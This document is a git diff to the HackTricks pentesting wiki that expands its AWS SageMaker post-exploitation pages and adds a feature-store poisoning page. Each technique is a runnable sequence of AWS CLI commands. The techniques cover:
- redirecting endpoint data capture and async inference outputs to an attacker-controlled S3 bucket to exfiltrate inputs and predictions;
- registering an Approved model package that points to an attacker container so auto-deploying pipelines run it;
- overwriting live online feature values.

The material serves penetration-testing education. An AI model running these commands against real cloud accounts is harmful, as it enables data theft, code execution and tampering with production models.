HackTricks-wiki
diff --git a/‎src/SUMMARY.md‎
Lines changed: 2 additions & 1 deletion b/‎src/SUMMARY.md‎
Lines changed: 2 additions & 1 deletion
diff --git a/‎src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md‎
Lines changed: 76 additions & 15 deletions b/‎src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md‎
Lines changed: 76 additions & 15 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md‎
Lines changed: 53 additions & 0 deletions b/‎src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md‎
Lines changed: 53 additions & 0 deletions
@@ -396,7 +396,7 @@
     - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
     - [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
     - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
-    - [AWS - SageMaker Unauthorized Access](pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md)
+    - [AWS - SageMaker Enum](pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md)
     - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
     - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
     - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
@@ -428,6 +428,7 @@
     - [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum/README.md)
     - [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum/README.md)
     - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum/README.md)
+    - [AWS - SageMaker Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md)
     - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum/README.md)
     - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum/README.md)
     - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum/README.md)
 
@@ -7,15 +7,15 @@
 Abuse SageMaker endpoint management to enable full request/response capture to an attacker‑controlled S3 bucket without touching the model or container. Uses a zero/low‑downtime rolling update and only requires endpoint management permissions.
 
 ### Requirements
-- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
-- S3: s3:CreateBucket (or use an existing bucket in the same account)
-- Optional (if using SSE‑KMS): kms:Encrypt on the chosen CMK
+- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint`
+- S3: `s3:CreateBucket` (or use an existing bucket in the same account)
+- Optional (if using SSE‑KMS): `kms:Encrypt` on the chosen CMK
 - Target: An existing InService real‑time endpoint in the same account/region
 
 ### Steps
 1) Identify an InService endpoint and gather current production variants
 
-```
+```bash
 REGION=${REGION:-us-east-1}
 EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
 echo "Endpoint=$EP"
@@ -26,7 +26,7 @@ aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "
 
 2) Prepare attacker S3 destination for captures
 
-```
+```bash
 ACC=$(aws sts get-caller-identity --query Account --output text)
 BUCKET=ht-sm-capture-$ACC-$(date +%s)
 aws s3 mb s3://$BUCKET --region $REGION
@@ -36,7 +36,7 @@ aws s3 mb s3://$BUCKET --region $REGION
 
 Note: Use explicit content types that satisfy CLI validation.
 
-```
+```bash
 NEWCFG=${CFG}-dc
 cat > /tmp/dc.json << JSON
 {
@@ -62,14 +62,14 @@ aws sagemaker create-endpoint-config \
 
 4) Apply the new config with a rolling update (minimal/no downtime)
 
-```
+```bash
 aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
 aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"
 ```
 
 5) Generate at least one inference call (optional if live traffic exists)
 
-```
+```bash
 echo '{"inputs":[1,2,3]}' > /tmp/payload.json
 aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
   --content-type application/json --accept application/json \
@@ -78,7 +78,7 @@ aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
 
 6) Validate captures in attacker S3
 
-```
+```bash
 aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize
 ```
 
@@ -92,14 +92,14 @@ aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize
 Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs included by the container) without modifying the model/container.
 
 ### Requirements
-- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
+- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint`
 - S3: Ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy)
 - Target: An InService endpoint where asynchronous invocations are (or will be) used
 
 ### Steps
 1) Gather current ProductionVariants from the target endpoint
 
-```
+```bash
 REGION=${REGION:-us-east-1}
 EP=<target-endpoint-name>
 CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
@@ -108,15 +108,15 @@ aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "
 
 2) Create an attacker bucket (ensure the model execution role can PutObject to it)
 
-```
+```bash
 ACC=$(aws sts get-caller-identity --query Account --output text)
 BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
 aws s3 mb s3://$BUCKET --region $REGION || true
 ```
 
 3) Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket
 
-```
+```bash
 NEWCFG=${CUR_CFG}-async-exfil
 cat > /tmp/async_cfg.json << JSON
 {"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
@@ -128,7 +128,7 @@ aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"
 
 4) Trigger an async invocation and verify objects land in attacker S3
 
-```
+```bash
 aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
 aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
 sleep 30
@@ -139,4 +139,65 @@ aws s3 ls s3://$BUCKET/async-fail/ --recursive || true
 ### Impact
 - Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime.
 
-{{#include ../../../../banners/hacktricks-training.md}}
+
+## SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved)
+
+If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy.
+
+### Requirements
+- IAM (minimum to poison an existing group): `sagemaker:CreateModelPackage` on the target ModelPackageGroup
+- Optional (to create a group if one doesn’t exist): `sagemaker:CreateModelPackageGroup`
+- S3: Read access to referenced ModelDataUrl (or host attacker-controlled artifacts)
+- Target: A Model Package Group that downstream automation watches for Approved versions
+
+### Steps
+1) Set region and create/find a target Model Package Group
+```bash
+REGION=${REGION:-us-east-1}
+MPG=victim-group-$(date +%s)
+aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"
+```
+
+2) Prepare dummy model data in S3
+```bash
+ACC=$(aws sts get-caller-identity --query Account --output text)
+BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
+aws s3 mb s3://$BUCKET --region $REGION
+head -c 1024 </dev/urandom > /tmp/model.tar.gz
+aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION
+```
+
+3) Register a malicious (here benign) Approved model package version referencing a public AWS DLC image
+```bash
+IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
+cat > /tmp/inf.json << JSON
+{
+  "Containers": [
+    {
+      "Image": "$IMG",
+      "ModelDataUrl": "s3://$BUCKET/model/model.tar.gz"
+    }
+  ],
+  "SupportedContentTypes": ["text/csv"],
+  "SupportedResponseMIMETypes": ["text/csv"]
+}
+JSON
+aws sagemaker create-model-package --region $REGION   --model-package-group-name $MPG   --model-approval-status Approved   --inference-specification file:///tmp/inf.json
+```
+
+4) Verify the new Approved version exists
+```bash
+aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table
+```
+
+### Impact
+- Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.
+- With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account.
+
+## Feature store poisoning
+
+Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints.
+
+{{#ref}}
+feature-store-poisoning.md
+{{/ref}}
@@ -0,0 +1,53 @@
+# SageMaker Feature Store online store poisoning
+
+Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints.
+
+## Requirements
+- Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord`
+- Target: Feature Group with OnlineStore enabled (typically backing real-time inference)
+
+## Steps
+1) Pick or create a small Online Feature Group for testing
+```bash
+REGION=${REGION:-us-east-1}
+FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
+if [ -z "$FG" -o "$FG" = "None" ]; then
+  ACC=$(aws sts get-caller-identity --query Account --output text)
+  FG=ht-fg-$ACC-$(date +%s)
+  ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)
+  aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN"
+  echo "Waiting for feature group to be in Created state..."
+  for i in $(seq 1 40); do
+    ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
+    echo $ST; [ "$ST" = "Created" ] && break; sleep 15
+  done
+fi
+```
+
+2) Insert/overwrite an online record (poison)
+```bash
+NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
+cat > /tmp/put.json << JSON
+{
+  "FeatureGroupName": "$FG",
+  "Record": [
+    {"FeatureName": "entity_id", "ValueAsString": "user-123"},
+    {"FeatureName": "event_time", "ValueAsString": "$NOW"},
+    {"FeatureName": "risk_score", "ValueAsString": "0.99"}
+  ],
+  "TargetStores": ["OnlineStore"]
+}
+JSON
+aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json
+```
+
+3) Read back the record to confirm manipulation
+```bash
+aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString"
+```
+
+Expected: risk_score returns 0.99 (attacker-set), proving ability to change online features consumed by models.
+
+## Impact
+- Real-time integrity attack: manipulate features used by production models without touching endpoints/models.
+- Confidentiality risk: read sensitive features via GetRecord from OnlineStore.